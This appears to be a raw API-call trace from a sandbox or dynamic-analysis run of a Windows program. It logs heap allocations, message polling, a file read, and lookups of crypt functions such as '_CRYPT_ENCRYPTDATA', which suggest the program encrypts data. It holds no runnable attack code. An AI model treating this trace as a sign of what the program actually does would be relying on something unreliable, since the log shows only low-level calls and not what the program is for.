1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.457] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.457] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.459] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x3bb6, lpOverlapped=0x0) returned 1 [0032.459] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb6) returned 0x945010 [0032.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb6) returned 0x958bd0 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb6) returned 0x945010 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.463] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb6) returned 0x945010 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb6) returned 0x89ffb8 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.466] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.466] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.467] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.467] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.468] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.469] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 